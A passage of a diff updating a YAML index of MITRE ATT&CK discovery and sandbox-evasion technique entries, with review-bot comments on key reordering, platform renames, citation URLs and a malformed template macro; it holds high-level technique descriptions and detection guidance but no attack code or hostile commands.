- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
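Review bot: `x_mitre_permissions_required: [User]` is dropped from T1087.003 with no replacement, so any index or filter in this repo that reads that field now gets nothing for this technique; please confirm nothing consumes it and call the removal out in the PR, since it arrives alongside the `x_mitre_attack_spec_version` move from 2.1.0 to 3.2.0 rather than as a stated change. Two smaller points in the same hunk: the Prevailion DarkWatchman citation now points at a web.archive.org snapshot, which is the right fix for a source that has gone away; and T1087.003's platform list shrinks from 'Windows', 'Office 365', 'Google Workspace' to 'Windows', 'Office Suite', so any per-platform index keyed on the old names will no longer pick this technique up.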
@@ -49935,6 +50583,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -49944,9 +50598,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -49956,102 +50615,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
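Review bot: most of this hunk is churn from a changed key order (T1497.003's references are re-sequenced, and the whole T1580 object is re-emitted with `description`, `name`, `x_mitre_detection`, `kill_chain_phases` and `x_mitre_data_sources` moved up and `url` moved below `description` in every reference) while the content is identical, which buries the three real changes: the Mandiant M-Trends 2020 `url` moves from content.fireeye.com to a mandiant.com PDF, the Deloitte Environment Awareness `url` gains a `/edit` suffix with its retrieved date bumped to September 13, 2024, and T1217's `modified` goes backwards (2023-05-09 to 2023-04-16). If the generator can emit keys in a stable order (sorted, or the previous order), future syncs would show only the substantive lines.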
@@ -50105,7 +50799,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -50135,7 +50828,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
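Review bot: the new detection text for T1016 contains `{{LinkById|T1059.008}` with two opening braces and one closing, an unrendered template macro that the rest of the same sentence does not use (the WMI and PowerShell references beside it are already rendered as markdown links). Since the hunk replaces the old `(LinkById: T1059.008)` form with another unresolved one, the generator should either resolve the macro into a link of the same `[...](https://attack.mitre.org/techniques/T1059/008)` form as its neighbours or at least keep the braces balanced; if the text is copied verbatim from upstream, say so in the PR so the malformed macro is not mistaken for a local edit.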
@@ -50173,12 +50866,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50205,14 +50897,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
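Review bot: the T1087 platform list replaces 'Azure AD', 'Office 365' and 'Google Workspace' with 'Office Suite' and 'Identity Provider' (version 2.4 to 2.5), the same consolidation applied to T1087.003 earlier in this patch. Anything in the repo that groups or filters techniques by the old platform strings (per-platform indexes, matrix generation) has to be regenerated or remapped in the same change, otherwise these techniques silently disappear from the Azure AD, Office 365 and Google Workspace views; please confirm the index CSVs were rebuilt from this data.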
@@ -50241,7 +50932,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
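Review bot: the T1087 entry has no `identifier:` line; the context shows `atomic_tests: []` directly after the removed `spec_version`, whereas the other techniques in this patch (T1007, T1040, T1135, T1120, T1082, T1016.002, T1010, T1497.003, T1580, T1217, T1016, T1482, T1083, T1049) carry `identifier: T<id>` immediately before `atomic_tests`. T1087.003 earlier in the patch is missing it as well, before and after the change, so this is pre-existing rather than introduced here, but since the generator is being touched anyway it is worth checking whether T1087 and its sub-technique fall through a code path that skips the key.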
@@ -50301,7 +50991,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -50320,7 +51010,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -50389,12 +51078,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -50471,40 +51159,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
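Review bot: this hunk deletes `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list for T1497, and every one of those keys is re-added lower in the same object by later hunks. The net change is a key reorder plus the `modified` update, but the diff reads as a 40-line deletion. Having the generator emit keys in a stable, sorted order (or the same order the upstream STIX uses) would turn future refreshes into a few-line diff and make it possible to verify that no reference was actually lost; for this object, the three removed references (mitre-attack, Unit 42 Pirpi July 2015, Deloitte Environment Awareness) do all reappear.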
@@ -50516,6 +51175,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -50526,8 +51189,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -50537,9 +51206,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
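Review bot: the Deloitte Environment Awareness entry changes both its `url` (now ending in `/edit`) and its retrieved date ('May 18, 2021' to 'September 13, 2024'), and the same edit appears again for T1497.002 further down. A Google Drive `file/d/<id>/edit` link points at the editor view rather than the shareable file view; if this is copied verbatim from upstream ATT&CK it can stay, but if it was hand-edited, prefer the bare `file/d/<id>` form so the citation resolves for readers without edit access. Unrelated to the URL, `x_mitre_attack_spec_version` is bumped 2.1.0 to 3.2.0 here while `x_mitre_version` stays at '1.3', which is consistent with a schema-only refresh.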
@@ -50572,7 +51260,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50590,12 +51278,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50603,11 +51290,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
